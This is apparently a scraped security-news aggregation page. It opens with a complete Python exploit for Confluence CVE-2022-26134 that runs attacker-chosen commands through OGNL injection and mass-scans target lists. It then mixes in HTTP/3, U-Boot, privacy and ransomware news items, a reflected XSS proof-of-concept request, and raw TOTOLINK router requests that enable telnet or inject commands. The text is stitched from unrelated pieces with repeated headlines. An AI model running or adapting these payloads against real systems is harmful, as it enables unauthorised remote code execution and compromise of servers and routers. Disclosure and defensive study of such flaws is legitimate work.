Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.

    #!/usr/bin/python3# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection# Google Dork: N/A# Date: 06/006/2022# Exploit Author: h3v0x# Vendor Homepage: https://www.atlassian.com/# Software Link: https://www.atlassian.com/software/confluence/download-archives# Version: All < 7.4.17 versions before 7.18.1# Tested on: -# CVE : CVE-2022-26134# https://github.com/h3v0x/CVE-2022-26134import sysimport requestsimport optparseimport multiprocessingfrom requests.packages import urllib3from requests.exceptions import MissingSchema, InvalidURLurllib3.disable_warnings()requestEngine = multiprocessing.Manager()session = requests.Session()global paramResultsparamResults = requestEngine.list()globals().update(locals())def spiderXpl(url):    globals().update(locals())    if not url.startswith('http'):        url='http://'+url        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",               "Connection": "close",               "Accept-Encoding": "gzip, deflate"}    try:        response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)        if(response.status_code == 302):            print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])            inputBuffer = str(response.headers['X-Cmd-Response'])            paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')        else:            pass    except requests.exceptions.ConnectionError:        print('[x] Failed to Connect: '+url)        pass    except multiprocessing.log_to_stderr:        pass    except KeyboardInterrupt:        print('[!] Stoping exploit...')        exit(0)    except (MissingSchema, InvalidURL):        pass        def banner():    print('[-] CVE-2022-26134')    print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')    def main():    banner()        globals().update(locals())        sys.setrecursionlimit(100000)    if not optionsOpt.filehosts:        url = optionsOpt.url        spiderXpl(url)    else:        f = open(optionsOpt.filehosts)        urls = map(str.strip, f.readlines())        multiReq = multiprocessing.Pool(optionsOpt.threads_set)        try:            multiReq.map(spiderXpl, urls)            multiReq.close()            multiReq.join()        except UnboundLocalError:            pass        except KeyboardInterrupt:            exit(0)    if optionsOpt.output:        print("\n[!] Saving the output result in: %s" % optionsOpt.output)        with open(optionsOpt.output, "w") as f:            for result in paramResults:                f.write("%s\n" % result)        f.close()if __name__ == "__main__":    parser = optparse.OptionParser()    parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')    parser.add_option('-f', '--file', dest="filehosts", help='example.txt')    parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)    parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)    parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')    parser.add_option('-c', '--cmd', dest="command", type=str, default='id')    optionsOpt, args = parser.parse_args()    main()

Confluence OGNL Injection Remote Code Execution

The backbone of the web has received a major upgrade

The backbone of the web has received a major upgrade

ANALYSIS The HTTP/3 protocol has received RFC 9114 standardization – a boost for internet security, but not one without hurdles for web developers.

This week, the Internet Engineering Task Force (IETF) released HTTP/3, published as RFC 9114.

The HTTP protocol is the backbone of the web. The Hypertext Transfer Protocol (HTTP) acts as an application layer for facilitating communication between servers and browsers, fetching resources, and transferring data. HTTPS is HTTP with additional security via encryption.

**BACKGROUND** HTTP/3: Everything you need to know about the next-generation web protocol

HTTP/3 is the latest revision of the HTTP protocol, taking over from 2015’s HTTP/2. HTTP/3 is designed to address some of the performance issues inherent in HTTP/2, improving the user experience, decreasing the impact of packet loss without head-of-line blocking, speeding up handshake requirements, and enabling encryption by default.

The protocol utilizes space congestion control over User Datagram Protocol (UDP).

**QUIC step**

One of the major differences in HTTP/3 is QUIC. Developed by Google, Quick UDP Internet Connections (QUIC) was adopted by the IETF, and a tailored version provides a cornerstone of HTTP/3.

As noted by Cloudflare, implementing QUIC sets up encrypted connections by default at the transport layer, combining handshakes into one action and encrypting the metadata exchanged between connections.

Read more of the latest secure development news

Packet numbers and header information is, therefore, removed from eavesdroppers and attackers. This improvement might potentially lower the success of manipulator-in-the-middle (MitM) attacks, IP spoofing, and denial-of-service assaults.

“This feature was not included in HTTP/2,” Cloudflare notes. “Encrypting this data helps keep actionable information about user behavior out of attackers’ hands.”

Encryption at the transport layer isn’t the end of the story. Akamai says that as HTTP/3 runs on QUIC, this also paves the way for future innovations in encrypted transport and communication – as we’ve already seen with the QUIC Datagram extension (RFC 9221), a technology to manage both UDP and TCP traffic securely.

Furthermore, the protocol supports zero round-trip time (0-RTT), introduced in TLS 1.3, which skips the handshake requirement in trusted settings – but a downside is that this could lead to replay attacks without adequate protection.

**‘Challenging prospect’**

Rustam Lalkaka, director of product at Cloudflare, previously told us that while HTTP/3 has a range of security and performance benefits, enabling QUIC can be a challenging prospect for developers as many widely-sed technologies are yet to add QUIC and HTTP/3 support.

Some transit providers and ISPs may be hostile to UDP traffic, and there may also be a need for increased CPU usage when HTTP/3 is implemented, a detriment to both servers and web browsers.

Support for HTTP/3 has been rolled out gradually across major browsers including Google Chrome, Mozilla Firefox, and Microsoft Edge. Apple Safari also provides support, although at the time of writing, this must be enabled in the ‘Experimental Features’ tab in the developer menu.

Cloudflare scans have revealed that the majority of online traffic is facilitated by HTTP/2. The majority of current HTTP/3 requests are made by Chrome users, followed by Edge and Firefox. Safari volumes are minimal, but Cloudflare expects an uptick once Apple enables HTTP/3 support by default.

Cloudflare Radar estimates that 8% of internet traffic is HTTP/1-based, followed by HTTP/2 at 67%, and HTTP/3 at 25%.

**YOU MIGHT ALSO LIKE** Dozens of high-traffic websites vulnerable to ‘account pre-hijacking’, study finds

HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

A reflected cross-site scripting (XSS) vulnerability in the login portal of Avantune Genialcloud ProJ - 10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

\# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting) # Date: 2022-06-01 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.avantune.com # Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com # Version: 10 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39) # CVE: CVE-2022-29296 Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject and execute arbitrary web scripts or HTML via a crafted payload. Request parameters affected is "msg". PoC Request: GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1 Host: \[REDACTED\] Cookie: ASP.NET\_SessionId=3recnmmlpo1glzzyejdoezk2 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept: \*/\* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Connection: close Cache-Control: max-age=0 PoC Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Wed, 11 May 2022 10:51:10 GMT Connection: close Content-Length: 8162 var Msg = 'Invalid username or password';alert("y0! XSS here :)")//'; ...\[SNIP\]... Timeline: 2022-01-05: Vulnerability discovered. 2022-01-06: Vendor contacted. 2022-02-07: No reply, vendor contacted for 2nd time. 2022-02-10: Request for CVE reservation. 2022-04-16: Assigned CVE number CVE-2022-29296. 2022-05-07: No reply, vendor contacted for 3rd time. 2022-06-01: Public disclosure. PoC Screenshots: https://imagebin.ca/v/6j86ekMqKZD8 https://postimg.cc/XXv6YbK9

CVE-2022-29296

A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.

CVE-2022-23712: Security issues

Cybersecurity researchers have disclosed two unpatched security vulnerabilities in the open-source U-Boot boot loader.
The issues, which were uncovered in the IP defragmentation algorithm implemented in U-Boot by NCC Group, could be abused to achieve arbitrary out-of-bounds write and denial-of-service (DoS).
U-Boot is a boot loader used in Linux-based embedded systems such as ChromeOS as well as

Cybersecurity researchers have disclosed two unpatched security vulnerabilities in the open-source U-Boot boot loader.

The issues, which were uncovered in the IP defragmentation algorithm implemented in U-Boot by NCC Group, could be abused to achieve arbitrary out-of-bounds write and denial-of-service (DoS).

U-Boot is a boot loader used in Linux-based embedded systems such as ChromeOS as well as ebook readers such as Amazon Kindle and Kobo eReader.

The issues are summarized below -

*   **CVE-2022-30790** (CVSS score: 9.6) - Hole Descriptor overwrite in U-Boot IP packet defragmentation leads to an arbitrary out-of-bounds write primitive.
*   **CVE-2022-30552** (CVSS score: 7.1) - Large buffer overflow leads to DoS in U-Boot IP packet defragmentation code

It's worth noting that both the flaws are exploitable only from the local network. But doing so can enable an attacker to root the devices and lead to a DoS by crafting a malformed packet.

The shortcomings are expected to be addressed by U-boot maintainers in an upcoming patch, following which users are recommended to update to the latest version.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Unpatched Critical Flaws Disclosed in U-Boot Bootloader for Embedded Devices

Plus: The US admits to cyber operations supporting Ukraine, SCOTUS investigates its own, and a Michael Flynn surveillance mystery is solved.

Not to freak out anyone, but there's a serious flaw in all supported versions of Microsoft Windows that allows attackers to take over your machine. The so-called Follina vulnerability can be exploited using a weaponized Word document, and security researchers say they've already spotted government-backed hackers using this attack in the wild. Fingers crossed that Microsoft, which has downplayed the severity of the flaw, issues a patch soon.

Speaking of patches, everything from Apple's iOS and Google Android to Chrome, Firefox, and Zoom received major security updates in May. Check out our complete list of available updates to see which apps you need to attend to as soon as possible.

We also explored the race to protect your voice from hackers and corporate greed. And we tried to unravel the mystery of China's sudden warnings about US state-sponsored hackers going after Chinese systems, despite the fact that these hacks are well known and happened ages ago.

Meanwhile, in India, the country's telecom regulator is preparing to crack down on robocall spam and scammers by requiring callers' names to appear on caller ID. The idea sounds good—until you realize the privacy implications and the fact that such a plan might not even work.

Finally, because nothing's sacred, Canada's privacy commissioner this week announced that a mobile app for Tim Hortons, the beloved coffee chain, illegally spied on its users' locations. The app, which used location-tracking tech from US-based firm Radar, collected a constant stream of users' location data—checking as frequently as every 2.5 minutes—and would create an “event” anytime a user “entered or left” their home, office, major sports complex, or rival coffee shop, according to the commissioner's office.

But that's not all, folks. Each week, we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there. 

If you lived in Illinois between May 1, 2015, and April 25, 2022, Google may owe you some cash. The company recently settled a class-action lawsuit over a feature in the Google Photos app that categorized photos of people based on their faces. The problem? According to the lawsuit, Google failed to receive consent to do so from millions of users, a violation of the state's Biometric Information Privacy Act. Google did not admit fault as part of the settlement, but it has agreed to pay $100 million and put in place measures to avoid further privacy violations. If you were an Illinois resident during that seven-year period and appeared in a photo uploaded to the Google Photos app, you can file a claim for your piece of the $100 million pie.

The blurry line between “at war” and “not at war” grew even fuzzier this week. General Paul Nakasone, the head of US Cyber Command and the NSA, told Sky News that the US military has conducted “a series of operations across the full spectrum," including “offensive, defensive, and information operations” in support of Ukraine's defense against Russia's invasion. Nakasone declined to detail what these operations entailed but assured that they were perfectly legal. The general's admission coincides with the US agreeing to provide Ukraine with advanced missile systems with a range of 50 miles. The Kremlin responded to this news by saying the US was “pouring fuel on the fire.”

As part of the US Supreme Court's investigation into the leak of a draft opinion overturning guaranteed abortion rights in the United States, the Court's clerks have been asked to turn over their private phone records and sign an affidavit, according to CNN. The “unprecedented” move is jarring for civil liberties advocates. As Albert Fox Cahn, found of the Surveillance Technology Oversight Project, writes for WIRED: “The intrusive probe reveals a disturbing about-face from the Supreme Court, and particularly Chief Justice John Roberts, on surveillance powers.” The clerks, meanwhile, are reportedly hesitant to refuse the demand for phone records or seek legal counsel for fear of being wrongly suspected of leaking the draft opinion to _Politico_ reporters.

A Trump-era conspiracy theory can finally be put to rest—theoretically, at least. A 52-page classified report into the “unmasking” of Michael Flynn, a former US national security adviser to Donald Trump, has now been made public thanks to a Freedom of Information Act request filed by Jason Leopold of Buzzfeed News. Republicans have long accused Obama administration operatives of revealing Flynn's name in classified material for political purposes in the lead-up to the 2016 election. But the Justice Department report, prepared by former US Attorney John Brash, found “no evidence that unmasking requests were made for political purposes or other inappropriate reasons during the 2016 election period or the ensuing transition period." Flynn ultimately resigned in 2017 for misleading vice president Mike Pence about Flynn’s calls with Russia's ambassador to the US.

Google May Owe You a Chunk of $100 Million

The latest iteration of CMD-based ransomware is sophisticated and tricky to detect – and integrates token theft and worming capabilities into its feature set.

A new CMD-based ransomware variant is still under development, but researchers warn that its poisonous combination of multiple layers of obfuscation and the sneaky integration of legitimate service links into its attack make it a potentially formidable threat. 

YourCyanide traces its roots back to the GonnaCope ransomware family first discovered in April, a new report from the Trend Micro threat hunting team explains. It doesn't actually encrypt anything yet (researchers say that's likely coming soon), but it does rename all targeted files, steal information, and pilfer access tokens from popular applications like Chrome, Discord, and Microsoft Edge. It also self-propagates.

YourCyanide includes a few new tactics, including using PasteBin, Discord, and Microsoft links to download its payload in stages, and hiding behind Enable Delayed Expansion functionality, the analysts note. 

"While YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework," the the ransomware variant report says. "It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links

In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can start telnet without authorization because the default username and password exists in the firmware.

The attacker can start telnet without authorization, the default username and password exists in the firmware.

Telnet is enabled by sending the following POST packet .

    POST /cgi-bin/cstecgi.cgi?action=1 HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setTelnetCfg","telnet_enabled":"1"}

CVE-2021-42892: vuln/totolink_ex1200t_telnet_default.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function NTPSyncWithHost of the file system.so which can control hostTime to attack.

There is a remote command injection in the function NTPSyncWithHost of the file system.so , we can control thehostTime to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"NTPSyncWithHost",
    "hostTime":"\"\nps>/web_cste/test1\n\""}

Tag

#chrome